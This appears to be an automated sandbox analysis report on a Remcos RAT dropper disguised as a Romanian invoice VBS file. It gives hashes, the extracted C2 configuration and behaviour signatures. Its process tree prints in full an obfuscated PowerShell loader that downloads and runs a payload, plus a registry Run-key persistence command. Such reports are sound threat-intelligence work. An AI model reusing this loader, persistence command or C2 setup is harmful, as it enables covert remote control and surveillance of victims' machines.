Overview

overview

10

Static

static

1

IMGRO Fact...do.vbs

windows7-x64

10

IMGRO Fact...do.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/10/2024, 16:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs

  • Size

    28KB

  • MD5

    a8da570deac5f16a0050802c0da5d7dd

  • SHA1

    9d8992e3770e41d8a431350e1cef73492dc240ea

  • SHA256

    c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d

  • SHA512

    7731d4d019eb8e3cfa5e2e5d5802e4033cf289134c15c3a237bcfd7559ab964265b82b825b65451a21703f441619081b9be46767923fb7f662aa12a86e997730

  • SSDEEP

    384:XrCiU16HKM4O+pbHLipRBP1Mv4Uwz+3S0KLV5Zsk+PNngq:Xen6HspbH2xdoftaV5Ck4N7

Score
10/10
remcosmiss chydiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TXCR8B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1016
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:1152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2540
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3604
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    3c639da48a2ccfc3b08d1aeae0ff3438

    SHA1

    1e7fcd39801606a63479db68ee8694cd928ee3fc

    SHA256

    e946df33f9c7d39cce9cd14ccb4c0fb1cf59b05440f047136023626cde495c36

    SHA512

    f4f44e0515bf156d573b2b619e3e8e63e6ff3bcf17936e9b70251e8456db61ce77c3715032a4a2ee2f9476075b81fed9b476cf9374b68fefe9125170bf2a9308

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    2d74f3420d97c3324b6032942f3a9fa7

    SHA1

    95af9f165ffc370c5d654a39d959a8c4231122b9

    SHA256

    8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d

    SHA512

    3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4oj2ytm.riw.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Clothesman.Vin
    Filesize

    475KB

    MD5

    87ff833a255506114faa969869e18546

    SHA1

    86316d90af91a20bffd5a586e7ae94befe65651d

    SHA256

    47a1ffa66a690b0adcf95f5a2141629e112ede25f80dda1adeb4f846f2d14beb

    SHA512

    6c484170c56d52f1f1786c8eb18ccbebb138c8a1f90b57c509c1e7d5a9fcf1bccecd4e0754df6836d9602651094c02c3c58d3c3d0d72b25451952a1dc8091509

    Download Submit

  • memory/2472-43-0x0000000006DD0000-0x0000000006E66000-memory.dmp

    Filesize

    600KB

    Download

  • memory/2472-40-0x0000000005BA0000-0x0000000005BEC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2472-47-0x0000000008580000-0x000000000BD60000-memory.dmp

    Filesize

    55.9MB

    Download

  • memory/2472-23-0x0000000002240000-0x0000000002276000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2472-24-0x0000000004DA0000-0x00000000053C8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2472-25-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2472-26-0x00000000053D0000-0x0000000005436000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2472-27-0x00000000054B0000-0x0000000005516000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2472-37-0x0000000005560000-0x00000000058B4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2472-45-0x0000000007FD0000-0x0000000008574000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2472-39-0x0000000005B70000-0x0000000005B8E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2472-44-0x0000000006D70000-0x0000000006D92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2472-41-0x00000000073A0000-0x0000000007A1A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/2472-42-0x0000000006110000-0x000000000612A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2540-4-0x00007FF942E63000-0x00007FF942E65000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2540-19-0x00007FF942E60000-0x00007FF943921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2540-16-0x00007FF942E60000-0x00007FF943921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2540-15-0x00007FF942E60000-0x00007FF943921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2540-22-0x00007FF942E60000-0x00007FF943921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2540-10-0x000002B231540000-0x000002B231562000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4440-54-0x0000000000EC0000-0x0000000002114000-memory.dmp

    Filesize

    18.3MB

    Download